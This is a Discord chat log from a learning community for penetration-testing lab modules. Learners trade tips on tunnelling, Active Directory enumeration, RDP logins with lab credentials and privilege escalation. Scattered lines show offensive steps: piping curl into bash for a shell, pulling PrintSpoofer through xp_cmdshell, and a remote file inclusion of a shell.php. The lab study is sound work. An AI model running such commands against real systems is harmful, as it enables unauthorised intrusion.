#modules

1 messages · Page 439 of 1

fathom pendant
#

Proxychains

silver ocean
#

I think this should not be an issue right?

#
proxy_dns
strict_chain


# add proxy here ...
# meanwile
# defaults set to "tor"
socks5    127.0.0.1 9050
#

@fathom pendant

fathom pendant
#

Looks fine

#

¯_(ツ)_/¯

#

Also dont copy/paste the configuration like that, due to markdown discord treats # as header tags

silver ocean
#

thank you so much for your time @fathom pendant , i will take care of that

fathom pendant
#

Wrapping in codeblock works best

silver ocean
#

indeeed

fathom pendant
#

But i suggest reaching out to support if my troubleshooting suggestions dont work

silver ocean
#

@fathom pendant applogies to disturb you again, on the same machine I was doing some experimentation:
Using these command i was able to login:

ssh -L 3389:172.16.5.19:3389 ubuntu@10.129.101.20
xfreerdp /v:127.0.0.1 /u:victor /p:pass@123 

would you have any clue why this worked, proxychains xfreerdp.... is not working

opal shuttle
fathom pendant
#

-L "Link"

#

At least thats how I read it

silver ocean
#

exactly....I know that much...but I guess Proxychains and xfreerdp3 need some configurations to work together

opal shuttle
#

Because 127.0.0.1 is a local host...u cant ping that from outside

#

Ssh is routing your traffic to local host

fathom pendant
#

-L [local_interface:]local_port:remote_host:remote_port

fathom pendant
opal shuttle
#

Thats y you were able to do rdp while its running on 127.0.0.1

fathom pendant
#

It's routing the traffic from the specified port through ssh to the remote machine

silver ocean
opal shuttle
silver ocean
#

I cant figure out this differential behaviour... as both serve the same goal...one succeeded one didnt

fathom pendant
#

It's not routing to your localhost

opal shuttle
fathom pendant
fathom pendant
#

From left to right

silver ocean
#

I hope you remeber we were unable to login via rdp using proxychains

opal shuttle
#

Well he got it

opal shuttle
#

But at some time u did without sudo

silver ocean
#

that was for NMAP😅

opal shuttle
#

Ohh

#

Hahahaa

fathom pendant
#

Sudo really is only required with nmap due to packet nonsense

opal shuttle
#

Yeah sudo works with nmap

#

He was trying sudo with xfreerdp

#

I guess

silver ocean
hasty mauve
#

Hi.

I'm in the Hacking WordPress - Skill Assessment.
I'm stuck on this question, I finished the assessment and got RCE but cannot find this flag.
The Hint says review the WPScan result but I did and that did not help much.
There is not "Unauthencatied File Download" vulnerability in the output, but there is LFI which I used to gain access to another flag.

opal shuttle
#

🤣

fathom pendant
#

There's a search feature in academy

opal shuttle
fathom pendant
#

They even said the module name

opal shuttle
#

I am not sure

fathom pendant
#

And section name lol

opal shuttle
#

Can u tell module number

silver ocean
opal shuttle
#

🥲

fathom pendant
#

I can access academy on phone, just turn on desktop mode in the browser

opal shuttle
#

Yeah its possible but its really small screen which i am not really comfortable to

eager spindle
#

I hope hackthebox can come out with a mobile app so that I can learn more conveniently.

#

I remember a while ago, I was studying with my phone outside, but I couldn’t operate pwnbox better, which was very frustrating.lol

opal shuttle
#

Nice try btw

west arrow
#

In documenting and reporting module they say :
"Do yourself a favor, use Word for Windows, and explicitly avoid using Word for Mac. If you want to use a Mac as your testing platform, get a Windows VM in which you can do your reporting. Mac Word lacks some basic features that Windows Word has....."

#

Any other solution for this? Im on mac but when im doing the exam i'll have lot's of windows open, already 1 vm, and running another vm with windows will take up lots of resources

opal shuttle
#

You can try that

#

Or u can try google one

west arrow
#

ummm, i'll do that then, thanks a lot

opal shuttle
west arrow
#

So i can use google docs?

opal shuttle
#

its free

west arrow
#

so is word, but for the cpts exam maybe I can't use google docs?

hasty mauve
west arrow
#

oh wow brilliant

#

thanks a lot @hasty mauve fingerguns

quick smelt
#

Salut !

gusty cobalt
#

hey, has anyone doing the Linux Local Privilege Escalation - Skills Assessment managed to get a shell on the box without using the provided SSH creds? i tried a bunch of stuff but no luck so far just wondering if it's even possible or if i'm overthinking it – any hints or confirmation would help.. i tried every attack path for tomcat man... i just need to figure it out to go on :))

storm elk
opal shuttle
#

@storm elk do you know who i am?

digital pendant
#

Waiting for PowerView to grab a groups ACLs takes mega time atm, over 60 minutes and just hanging, getting a user's ACLs fine tho.

AS far as I can see in the section text I'm following it. Question wanted me to check the GPO Management group

opal shuttle
#

i think you can check that...

digital pendant
#

Thank you

opal shuttle
hasty mauve
hasty mauve
#

Is the Web Service & API Attacks the CBBH version of Attacking Enterprise Networks?

#

like Is it worth a blind attempt?

#

or should I just go with the walkthrough?

warped plank
#

Hi All, once my year subcription ends, will I still have access to the already started modules? if its 1/20 for example?

hasty mauve
warped plank
#

Makes sense, I was curious if the module is considered "Already purchased"

acoustic owl
opal shuttle
#

u will have access for it , even if your subs expires

warped plank
leaden island
#

yo guys

#

im on privileged access from AD attacks

#

so the question says What other user in the domain has CanPSRemote rights to a host?

#

so i collected all objects in the domain using sharphound

#

and transfered them to my linux

#

i uploaded all the .json files to bloodhound

#

and i used this cypher command from the module (which, should show all users with CanPSRemote permission)

#

MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2

#

but nothing appeared

#

i ended up using powerview to get the members of remote management users group of the ACADEMY-EA-DC01 (because i already know that computer name exists, so i tried it. but what if i didnt know it ?), and i got the user

#

why it didnt appear in bloodhound ?

waxen totem
vapid prawn
#

Just wondering, is there a way to "reset" a module and do it again? Erase the answers

leaden island
#

i guess it would do the job later too

vapid prawn
opal shuttle
wild oriole
worn aurora
#

For the Advanced Command Obfuscation answer make sure after ip= that there is no newline or spaces in burp repeater

quartz lagoon
#

if you have the correct NTLMv2 hash, rockyou should do it

sharp notch
#

Just did retire nibbler model in the walk through academy

#

One more to go for the beginner part privilege escalate to root

#

Is Linpeas good to use for the boxes it does a lot of enumeration within it

icy plume
gray yacht
icy plume
gray yacht
icy plume
#

Thank you

gusty cobalt
opal shuttle
opal shuttle
gusty cobalt
opal shuttle
#

Or rdp

floral fulcrum
#

Hi anyone free for a DM for DACL 1 Skills assessment, just want to clarify something in regards to the ACL

opal shuttle
#

Then use curl and pipe it over to bash

fathom pendant
#

@gusty cobalt let's try not to spoil info for modules above t0, even if it's an alternate way to get a shell

rustic sage
#

I found the process argument but it's not working

rustic sage
#

No one was helping me since yesterday

fathom pendant
#

I haven't done that module

rustic sage
#

Oh

gray yacht
gusty cobalt
proper dove
#

help plesase

fathom pendant
#

@proper dove dont spoil module content

#

Use the literal word 'PORT' instead of the given port

long kestrel
steady torrent
#

Hey, i just found someone with lot of the academy content outside of HTB without mentioning HTB, can I DM a moderator ?

fathom pendant
opal shuttle
opal shuttle
leaden island
#

yo guys im trying to copy printspoofer.exe to a host for PE though an mssqlclient.py session with xp_cmdshell

#

ive made an smbserver.py with creds because host dosent allow guest auth to smb share

#

when i type xp_cmdshell whoami i get nt service\mssql$sqlexpress

proper dove
leaden island
#

the password (as the module mentions for this sql service account) is SQL1234!

proper dove
opal shuttle
leaden island
#

so i tried setting the user in smbserver.py to mssql$sqlexpress and password to SQL1234! but when i try to download the file using xp_cmdshell copy \\ip\sharename\printspoofer.exe i get the user or password is incorrect

rustic sage
#

Hi I am currently on the active directory enumeration and attacks and I am having lots of issues with rdp. I've tried multiple solutions and I just can't connect for some reason

fathom pendant
rustic sage
#

I am

#

I am not using the vpn

fathom pendant
#

oof

#

that's a mood

leaden island
fathom pendant
leaden island
jagged kraken
#

Does anyone else have an issue where you try to ssh the target, but then you are unable to type the password?

leaden island
#

its annoying when it happens tho

#

sometimes it stays like that for days

fathom pendant
jagged kraken
#

Oh

limber schooner
#

Hey guys

leaden island
#

i guess it acts wired cuz its a service account

fathom pendant
#

well no, what I mean is that if you're copying a file From your smb share, sometimes windows doesn't like to grab files from a service you're not authenticating to. (i.e. your smb share isn't using a user/pass, so Windows doesn't like that)

#

@limber schooner this isn't the server for that kind of nonsense

limber schooner
#

Soryy

fathom pendant
#

the general only way an account gets hacked is if you run a program from a "friend"

#

but this isn't a tech support server.

#

best practice is to just reset and change all your passwords

rustic sage
#

for the question above earlier

#

i just didnt put a "," for exit which was sutpi d

fathom pendant
#

lol that's silly

rustic sage
#

wrong reply also

#

yeah, it's silly how they made me do it, even though what i had was right and I knew i was correct

tranquil wren
#

I just wanted to bump this, i found the process and killed it but it booted me out of the target, has anyone ran across this issue?

safe star
#

You don’t need to place the copy there

tranquil wren
#

thank you

rustic sage
#

I have a question, since i completed this. How do I check what modules i done for that path?

#

So i can go back and read stuff over

#

oh

#

didnt een know that was a thing

#

will say this took me a week and a half to do

#

Oh boy im scared about the exam

#

yeah im just gonna look at the CPTS win priv escalation before i do anything

gray yacht
#

Can DM what you are trying.

mighty forum
#

could someone help with with the skills assemsent on the cbbh module

white pulsar
#

hi

#

@verbal ivy why i cant chat in general?

#

sorry for the ping

verbal ivy
white pulsar
#

u can help me?

verbal ivy
#

Tag a mod not me

white pulsar
#

uo ok

#

@novel matrix why i cant chat in general chat sorry for the pin

flint palm
#

Guys hello I bought wireless usb adaptor and can anyone help me to configure it?

dry falcon
calm palm
#

Same thing for me, and that's considering that the web app is mega slow

opal shuttle
final kite
devout lily
#

Hi everyone, im tryng to install SecLists and Gobuster for the Web Enumeration module, but as you can see the installation of both give me an error, can someone tell me how to fix it?

drowsy raptor
#

--fix-missing generally works

devout lily
drowsy raptor
#

sudo apt-get --fix-missing

devout lily
drowsy raptor
#

It's for installing missing packages that may be preventing full installation of any tool, including seclists and gobuster

devout lily
#

This is the output

#

Seems that there is a syntax error

delicate adder
#

I'm trying to install defaultcreds-cheat-sheet with pip3 but it gives me this error. I tried to do what it tells me but it doesn't work. I tried to search online and I didn't understand much.

drowsy raptor
#

sudo apt-get update --fix-missing

devout lily
drowsy raptor
#

run this as root

drowsy raptor
drowsy raptor
devout lily
#

The same than before

drowsy raptor
#

You're getting that while using the --fix-missing argument?

opal shuttle
#

Pipx install <name>

devout lily
opal shuttle
#

Then install gobuster

devout lily
#

Im tryng

drowsy raptor
gray yacht
golden ocean
#

Hi how can can we get bsd brawl pls

wide olive
#

Anyone got a decent cheat sheet for windows privesc?

spare fossil
#

Module: MSSQL, Exchange, and SCCM Attacks/SCCM Site Takeover II/ question2: Connect to the shared folder \LAB-DC\SCCMShare\SCCMServer01 using the hash of SCCM01$, and read the content of the file flag.txt.... i got the hash, but cant connect, either login failure or connection refused

rich obsidian
gray yacht
gray yacht
spare fossil
gray yacht
spare fossil
spare fossil
gray yacht
spare fossil
flint palm
#

Guys if this question is not appropriate pls delete or forward me to another place. I bought usb wireless adaptor for my VM but when i hit command sudo airodump-ng wlan0mon I don't see any networks it starts working but doesn't show me networks?!

acoustic owl
#

You don't need a USB wireless adapter for the modules.

flint palm
#

I need it for myself

lone raven
#

im doing ctf fawn and taks 7 says : What is the command we need to run in order to display the 'ftp' client help menu? and i said ftp -h i searched on youtube other ppl doing it for them the answer works for me it dosent can anyone help

acoustic owl
flint palm
#

Bunny I know what is legal and what is not legal may be I just learning something new for myself may be I have an assesment with a client to check his or her wireless networks there may be many options

acoustic owl
flint palm
#

I know that it doesn't have but possibly here will be a person who will help me and as there is no such person the question is closed

fathom pendant
acoustic owl
fathom pendant
#

You'll need to link your account via #welcome instructions

sick stump
#

hey guys in the skill assessment medium footprinting, after i found the creds through mounting the nfs server, when i tried to xfreerdp into it like this
xfreerdp /v:10.129.220.178 /u:alex /p:"....."
it throws this error

bash: !mD: event not found

i tried to bypass it using set +H and then set -H after i execute the cmd, but then the rdp connection prompts this
[23:24:54:028] [2803:2804] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[23:24:54:028] [2803:2804] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[23:24:57:227] [2803:2804] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[23:24:57:228] [2803:2804] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[23:24:57:228] [2803:2804] [ERROR][com.freerdp.core] - freerdp_post_connect failed

can someone help me with this

fathom pendant
#

! Is a special character in bash to invoke history

sick stump
#

idk if its a problem with my vpn or something, cuz i can ping the target host without any error during transmission

fathom pendant
#

Try resetting the target

#

Or changing vpn regions

#

Or resetting your vm

sick stump
#

lemme try using the tcp and resetting the target

sick stump
fathom pendant
coarse crest
#

?

strange trench
#

Im confused by the AI red team Manipulating the Model exercise there is no fixed input message or and indication of what the questions for the exercise wants?

fathom pendant
#

@coarse crest thats not what this server is about. Reach out to the website support for whatever company you lost your account on.

#

Reach out to their support

coarse crest
sick stump
fathom pendant
coarse crest
#

Ohh it's alright thank you

strange trench
#

Can anyone help me understand what Manipulating the Model exercise answer requirements are for the questions its not clear to me what its looking for in a text answer?

flint palm
#

may be you specify module and section you are working on?

strange trench
#

Introduction to Red Teaming AI - Manipulating the Model

flint palm
split hemlock
#

A serious community is always good, and in a way it is also a science of formation and organization while maintaining authority so that the community does not give the impression of a complete fan community. In this community, this is not observed, no matter who is doing it.

fathom pendant
split hemlock
# fathom pendant ?

In every community you seek seriousness, like a reliable shore in a stormy sea. This is the science of order, of how to maintain authority so as not to get bogged down in the chaos of a fan club. But here, in these parts, this science cannot be found. And it does not matter who was looking for it, who needed it. All efforts were drowned in silence.

fathom pendant
#

? We redirect people to the appropriate places to ask questions, if possible.

#

There are more serious channels, but those require linking your htb account to view and access

strange trench
#

Is there really nobody that can assist with Intro to Introduction to Red Teaming AI - Manipulating the Model I just want to understand what the questions for the lab want?

fervent mauve
#

Anyone done the User Behavior Forensics module? I'm stuck on the last question in the skills Skills Assessment, i've found the timestamps of the copy paste event in the sqlite db but they aren't right apparently.

swift pike
#

Guys i did the Learning Progress module but i cant understand the last and only question that says:
1.00 to the power of 365=1
1.01 to the power of 365=37
"What is the difference between the two numbers of the learning progress mentioned above?"

#

Like i understood it and answered it but It keeps saying "incorrect answer" what should i do 🙏☹️

fathom pendant
swift pike
#

Still incorrect

fathom pendant
#

1.01^365 != 37. It's 37.7

#

It's even stated in the reading portion

sick stump
#

hey guys im finally done with the footprinting module, but i mostly struggle when i access IMAP/POP3 servers, like their queries are so stupid so does any1 have a good cheat sheet regarding their stupid queries

#

I tried to find some for them, but couldn't find for some rzn

fathom pendant
sick stump
fathom pendant
#

A blog, by a company (atmail) that details commands

sick stump
#

oh finally man something thats nice, thanks so much dude 🙏

rich obsidian
sturdy oracle
#

Why can’t I talk in general

fathom pendant
gray yacht
slate palm
#

please help 😦 I am doing the Remote File Inclusion (RFI) section in the module named File Inclusion

I tried curl and ping to the ip, everything works just fine on both the browser and the terminal. The page shows
<h2>Containers</h2>
<br />
<b>Warning</b>: include(http://10.10.15.173:80/shell.php): failed to open stream: Connection timed out in <b>/var/www/html/index.php</b> on line <b>47</b><br />
<br />
<b>Warning</b>: include(): Failed opening 'http://10.10.15.173:80/shell.php' for inclusion (include_path='.:/usr/share/php') in <b>/var/www/html/index.php</b> on line <b>47</b><br />
<br />

spare fossil
# gray yacht You can DM if you'd like.

hey i actually got it, i couldnt sleep cause of this... why i was stuck was cause, they didnt explain this in the course material, so i had coerce a second time for the intentended machine so it can create a socks relay, for this to work i had to petitpotam twice, not once like in material or even the solution, which made me doubt myself even more. at last i got it.

i dont think someone that follows the course will get it, kinda feel bad for them, knowing how rare someone actual can help

#

and now, i must pay back my sleep debt 🤌

gray yacht
spare fossil
gray yacht
glacial remnant
sharp notch
quartz lagoon
merry crag
#

Yo guys Ive been stuck for a while on the Password Attacks assessment. Ive Gotten RDP into JUMP01 and I have tried EVERYTHING (ive thought of) but the only thing I have gotten is a password like
<AdministratorPassword>
<Value>REDACTED_r00t!@0</Value>
<PlainText>true</PlainText>
</AdministratorPassword>

But I cant use this to gain Local administrator rights??? Is this for another account? is this just a red herring? is it not local admin???

#

ive also found a .psafe3 file but Ive tried to use that password with no success.

#

Im legit stuck. Ive been doing this for 5 hours and I have no clue where to go. If anyone has any hints for privesclation

rustic sage
#

I need help buying the CJCA exam voucher

cloud urchin
sharp notch
#

stuck on getting started privege escalation to root

#

i was able to get lineum running maybe gotta mess with reverse shell a bit a different one

cloud urchin
sharp notch
#

yes i ls -la

cloud urchin
#

no, that lists the contents of your current working directory

#

re-read the section about privileges and try some of that

sharp notch
#

hmm ok

#

i did echo $TERM it came back as "dumb" lol

cloud urchin
sharp notch
#

i did sudo -l im going to look because i think its staring me in the face

#

i already did linenum imma recheck ill hit u in a few

cloud urchin
#

@dry falcon Please do not spoil content from modules above tier 0

opal shuttle
sharp notch
#

yes

#

/usr/bin/php is nopasswd

#

if im saying too much let me know i dont wanna spoil it for anyone else doing this one

#

bruh

#

i feel like i worked around this

#

it was in my effing face

sacred basin
#

hey guys can anyone help me with this please i have the Summary report but i cannot find the pass

cloud urchin
sharp notch
#

wait nvm

#

ok imma check it all out

opal shuttle
sharp notch
#

yes, imma messag you

sacred basin
sharp notch
#

update: i escalated with the help of thefieryflame

#

i was doing it all backwards

proven plinth
sharp notch
#

fieryflame is the best

#

he explains teaches

#

i was banging my head on the wall for that module for 7 hours

candid lily
#

has anyone managed to solve prompt injection module jailbreak 2? i got the flag but i didnt solve it properly, the llm didnt even give me proper response needed for conditions to flag but i got it anyways

sacred basin
wooden seal
#

can any one help me with remote & local port forwarding with ligolo-ng (i searched up internet for 2 days still cant figure out) ; D

opal shuttle
wooden seal
fathom pendant
#

From: the remote interface:port
To: either your device or some other remote device

#

I suggest messing with ligolo in the double pivot sections in the port fwd sections

hardy spire
#

i found dante to be good for ligolo practice if u plan on doing that

fathom pendant
#

If you have a solid understanding of port forwarding it makes sense

wooden seal
#

had to use ssh port forwarding with ligolo

fathom pendant
#

I swear theres some syntax stuff in the ligolo docs

wooden seal
fathom pendant
#

it helps to know what youre struggling with ¯_(ツ)_/¯

wooden seal
#

wait will drop command here

fathom pendant
#

Like is it the --from --to syntax?

hardy spire
#
listener_add --addr 0.0.0.0:11111 --to 127.0.0.1:22222 --tcp

its just this

wooden seal
#

listener_add --addr 0.0.0.0:30000 --to 127.0.0.0.1:10000 --tcp

#

after using it how should i use my http.server to transfer file to target or vice versa (i tried it wasnt working)

fathom pendant
#

--addr is the remote/target and port

wooden seal
#

Will try that. Thank you

fathom pendant
#

For multiple hops, --addr <either 0.0.0.0 or a specific interface on the target>:11601 --to 127.0.0.1:11601

#

Repeat for each hop in the session

#

If you run ligolo with sudo it can even create interfaces so you dont have to stop/start sessions in order to continue pivoting

wooden seal
#

Thanks a lot

fathom pendant
#

I think i ended up setting the suid bit for it bc im lazy lmao

#

And as a general tip, for windows machines you may need to do
Set-ExecutionPolicy Bypass -Scope Process

#

Otherwise it can cause issues

heady swan
#

Hello !

Did the machine for Velociraptor work for you ? The path URL never work with VPN or HTB VM 🙂

  • Introduction to Digital Forensics > Evidence Acquisition Techniques & Tools
opal shuttle
#

Its because

#

Nvm

fathom pendant
opal shuttle
#

Thanks for the care btw

fathom pendant
#

👍

spiral sapphire
#

Hey! I'm getting these errors when doing SSH port forwarding, any tips?

channel 4: open failed: connect failed: Temporary failure in name resolution
channel 5: open failed: connect failed: Temporary failure in name resolution
channel 6: open failed: connect failed: Temporary failure in name resolution
channel 7: open failed: connect failed: Temporary failure in name resolution

fathom pendant
#

Connection issues most likely

spiral sapphire
#

Could it be an issue on the BOX? I've tried disconnecting and connecting again and still get these.

spiral sapphire
opal shuttle
spiral sapphire
fathom pendant
#

Ligolo-ng is superior

fathom pendant
fathom pendant
#

Ah, I used ligolo for my pivoting

spiral sapphire
fathom pendant
#

And allows icmp traffic

spiral sapphire
fathom pendant
#

If you understand the fundamentals of how pivoting and port forwarding works: yes

slate hamlet
#

just wanted to know once i complete a module, even if my subscription runs out will i always have access to that information for reference?

fathom pendant
#

Any module completed under the access based subscriptions are yours forever

sweet jewel
sweet jewel
fallen arrow
#

Hello, where do we report bugs? Cubes icon is gone from the academy!

drowsy raptor
#

Or, reach out to HTB support if it's a technical bug

fallen arrow
#

Can you see it or is it just me?

drowsy raptor
#

Uh not sure. If an icon isn't loading, it could just be you

fallen arrow
#

The cube icon is gone from everywhere in the Academy, modules, menu, Billing Page

drowsy raptor
#

I still see the cube icon. Unless you mean the number of cubes you own. You can find that in billing

fallen arrow
#

Yeah, I see the number but I don't see the cube logo, the green cube

drowsy raptor
#

Not sure about it, might be a UI update. Reach out to HTB support

foggy snow
#

anyone here happen to have experience with the tool subbrute? I just can't seem to get it to work.
Module: Attacking Common Services
Section: Attacking DNS

fallen arrow
#

Like if you open any module, it is blank, no cubes on the right side of the section for example. Yeap

fallen arrow
#

Are you using firefox?

foggy snow
#

yes

digital pendant
#

idk if its just my end but HTB visual bug happening, no extension button. Probs the image ref failing.

vocal schooner
#

Hello, i'm using the HTB box, 'LLMNR NBT NS Poisoning from Windows' , i have to use Inveigh in RDP, but the session crash, i can't close the rdp session...

digital pendant
fallen arrow
#

Good I ain't alone

digital pendant
#

bummer academy is having some issues, all of my progress is bugging out too!

fallen arrow
#

Exactly, this is what I was talking about!!!

#

Why doesn't it let me paste images in the chat

digital pendant
#

ah okay then I am having exactly the same issue as you lol

drowsy raptor
#

you need to vatat

foggy snow
#

Ahhh gone for me too when I refreshed page

drowsy raptor
#

*verify

fallen arrow
#

Alright

digital pendant
foggy snow
#

clearly means "verify at the available time"

fallen arrow
#

Some next level cover

digital pendant
#

on brightside the progress is stored elsewhere just a visual bug, support looking into it

fallen arrow
#

As long as the progress is not tied to this visual bug, it's bearable

digital pendant
#

imagine if it was client-side progress only 😄 then people would be able to 100% the course and take an exam without ever doing a module

fallen arrow
#

But now I realise how more satisfying is having those cubes

digital pendant
#

it really is a huge motivator and demotivator if you haven't got far through a module ikr!

#

36 sections basically is 3 modules in one this AD Enumeration 😄 fun as hell tho

fallen arrow
#

I am currently doing the Introduction to Windows Command Line. Lots of text

digital pendant
#

some modules be like that...

foggy snow
fallen arrow
#

Do you practice after every module in Labs or you firstly finished all the general modules like which are the prerequisite for CPTS i.e and then went into labs?

digital pendant
#

I haven't 100% the course yet so im at 66.7% I haven't done pro labs yet but I frequented VulnLabs over last 6 months, once done ill probs do a few labs and AEN blind and see where im at

fallen arrow
#

I mean machines in HTB Labs, not the Labs themselves😅

digital pendant
#

ooh the labs as in bottom of each section / module ?

#

these?

fallen arrow
#

No, like machines in Starting Point, Retired ones...

foggy snow
#

^ not related to Academy

digital pendant
#

I see! yeah I probs won't do much outside of academy and then reinforce with Pro Labs only, see where im at

fallen arrow
#

Hm, are you satisfied with the practice just in Academy?

foggy snow
#

There is a checklist of labs machines that are good for prepping for CPTS

digital pendant
#

I dont know how bad my methodology is till I actually put it to work

fallen arrow
#

What is AEN?

digital pendant
#

Attacking Enterprise Networks, last module of CPTS

fallen arrow
#

I see

digital pendant
#

It has been mentioned doing this blind is the real test before your exam, writing a report etc

fallen arrow
#

I am still not sure whether I wanna proceed first with CPTS or CBBH after I complete the Information Security Foundations. I know both are different, but both seem engaging, especially CBBH could be put in more practice irl for now, i.e, I think

digital pendant
#

you got a subscription or you buying with cubes atm?

#

I wasted first few months of my sub so I am doing cpts only now

fallen arrow
#

I am using the Student Sub, but in August I will buy the Silver Annual. CJCA looks like a good start too before the other two exams.

digital pendant
#

when you do CPTS youll find the modules overlap with CBBH so im almost 2/3 way through and I barely did any CBBH modules intentionally

fallen arrow
#

I just wanna jump into machines, but I ain't sure how much should I know before I do that

#

That's great

digital pendant
#

visual bugs have gone for me

fallen arrow
#

Yay, indeed

brave scroll
#

when you will complete CPTS, your CBBH will be 64.9%

sand rose
digital pendant
#

Perfect timing 😄 was just going to ask if you knew!

digital pendant
hybrid sandal
#

Hello, good morning (here it's morning) I would like to know if anyone knows of a store like Silk Road on the dark web.

digital pendant
#

Not the place for this @hybrid sandal

hybrid sandal
#

I live in Brazil

fallen arrow
#

Not for clear net discussion)

hybrid sandal
#

anything I import I pay double the price

digital pendant
#

im not sure if this is a serious rule break or not, waiting for a mod to decide 😄

hybrid sandal
fallen arrow
digital pendant
#

I find you just have to take the first step Rich, start doing one of them, then you'll know which one you prefer

#

and take the time to make notes, don't just CnP like I did in beginning 😄 have to revisit a few modules knowing that

sand rose
dry falcon
#

me getting same error how to fix it 😕

fallen arrow
# digital pendant I find you just have to take the first step Rich, start doing one of them, then ...

Yeah, I create cheatsheets and note other useful information in Obsidian to later refer to. Yeap, I can't wait, but I think will give myself some time to finish the Intro part, and then will jump straight into the paths. I for sure by the time have finished some module may forget something I learnt, but I think quick refresh through the module and notes will bring back the knowledge. But of course this is probably because of sort of lack of proper practice.

fallen arrow
#

I guess there will be no deals on the VIP plans before Black Friday, as I am really looking into getting the VIP+ too

#

Did you buy your sub right in the beginning or I can benefit in some way having the free plan?

sand rose
fallen arrow
#

On the starting point I saw only half of the machines in each section are free, but would that be enough for beginner

sand rose
fallen arrow
#

Yeah, I missed my chance in 2024

sand rose
fallen arrow
#

Probably will wait then, and grind the free ones in the meantime together with the Academy sub

fallen arrow
#

Thanks for the suggestions and help

analog sparrow
#

How to start my ethical hacking journey. What type of knowledge is required but the way i know coding like python and web development. Can some one guide me

compact patrolBOT
analog sparrow
#

HTB course are too expensive for me so can give me some another option

acoustic owl
dry falcon
opal shuttle
#

Which module

faint hamlet
#

I am doing Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux section in Active Directory Enumeration & Attacks. How to solve clock skew error as the attack host does not have either ntpdate or faketime?

└──╼ $GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation

Password:
<snip>


[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
faint hamlet
# faint hamlet I am doing Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux secti...

I even tried to pivot and use my own host tools but got a new error sadglas

┌──(faiz㉿FAIZ-XEON)-[~/HTB_Academy]
└─$ sudo timedatectl set-ntp off
┌──(faiz㉿FAIZ-XEON)-[~/HTB_Academy]
└─$ sudo ntpdate -u FREIGHTLOGISTICS.LOCAL
[sudo] password for faiz:
2025-08-01 15:37:44.541814 (+0500) -86524.735147 +/- 0.214486 FREIGHTLOGISTICS.LOCAL 172.16.5.238 s1 no-leap
CLOCK: time stepped by -86524.735147
CLOCK: time changed from 2025-08-02 to 2025-08-01

┌──(faiz㉿FAIZ-XEON)-[~/HTB_Academy]
└─$ GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley: -request
Impacket v0.13.0.dev0+20250605.14806.5f78065 - Copyright Fortra, LLC and its affiliated companies
<snip>
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

┌──(faiz㉿FAIZ-XEON)-[~/HTB_Academy]
└─$ sudo ntpdate -u INLANEFREIGHT.LOCAL
2025-08-02 15:40:08.602184 (+0500) +86524.697654 +/- 0.150084 INLANEFREIGHT.LOCAL 172.16.5.5 s1 no-leap
CLOCK: time stepped by 86524.697654
CLOCK: time changed from 2025-08-01 to 2025-08-02

┌──(faiz㉿FAIZ-XEON)-[~/HTB_Academy]
└─$ GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley -request
Impacket v0.13.0.dev0+20250605.14806.5f78065 - Copyright Fortra, LLC and its affiliated companies

<snip>
[-] Principal: FREIGHTLOGISTICS.LOCAL\mssqlsvc - Kerberos SessionError: KRB_AP_ERR_TKT_NYV(Ticket not yet valid)
[-] Principal: FREIGHTLOGISTICS.LOCAL\sapsso - Kerberos SessionError: KRB_AP_ERR_TKT_NYV(Ticket not yet valid)
faint hamlet
valid gate
#

Hey guys, is there anything I can do about this? Idk if I accidentally posted something here or if it's because of my blog...

valid gate
#

How long does it typically take to hear back? I was planning on working through the academy all day today

#

I wish somebody would have tried messaging me first either on here or on medium

elder matrix
#

for gobuster, how many threads (-t) should be speedy, yet stable?

errant moss
#

Hello! I could take a hint on how to transfer files from client-provided ATTACK01 Parrot box back to my system. I'm currently working on AD enumeration and attacks, initial information gathering of the domain,

https://academy.hackthebox.com/module/143/section/1265

And while RDP connecting to the provided ATTACK01 box the window is ridiculously small so reading Wireshark output is a struggle. And either way I'd like to take the advice and transfer files and findings back to my system, in this case I'd like to bring home my Wireshark packet capture for inspection.

I've tried mounting a directory with 'xfreerdp's 'drive' switch but I could then not find it anywhere in the file system, nor with 'mount':

xfreerdp /v:<ATTACK01 IP> /u:htb-student /drive:/home/<my user>/rdp_share,/home/htb-student/rdp_share

Any advice on how to get files home from ATTACK01?

valid gate
# acoustic owl Reach out to support

is there any chance you could nudge somebody for this? I'm happy to remove anything that violates terms. Just want to get back on today if possible. nob1as is my email handle

#

I sent an email to customerops for the record

acoustic owl
errant moss
rustic sage
#

hello why i have no access in the general chat

waxen totem
rustic sage
waxen totem
rustic sage
waxen totem
hallow crystal
#

Yo

proper dove
#

HI !
Anybody can help me please !
https://academy.hackthebox.com/module/18/section/2093

Question :
What is the Type of the service of the "dconf.service"?

Tried:
─[eu-academy-6]─[10.10.15.18]─[htb-ac-2056516@htb-hrc0hoadlw]─[~]
└──╼ [★]$ sudo systemctl show dconf.service^C
┌─[eu-academy-6]─[10.10.15.18]─[htb-ac-2056516@htb-hrc0hoadlw]─[~]
└──╼ [★]$ systemctl list-units --type=service | grep dconf
┌─[eu-academy-6]─[10.10.15.18]─[htb-ac-2056516@htb-hrc0hoadlw]─[~]
└──╼ [★]$ systemctl list-unit-files | grep dconf
┌─[eu-academy-6]─[10.10.15.18]─[htb-ac-2056516@htb-hrc0hoadlw]─[~]
└──╼ [★]$ sudo systemctl show -p Type dconf
Type=

Any hint ?

proper dove
#

yes, i tried it !

#

wait, thx !

wraith ruin
#

can anyone help me in "windows file transfer method". i cant able to connect with RDP, it shows tls handshake failed

umbral matrix
#

Hi all

#

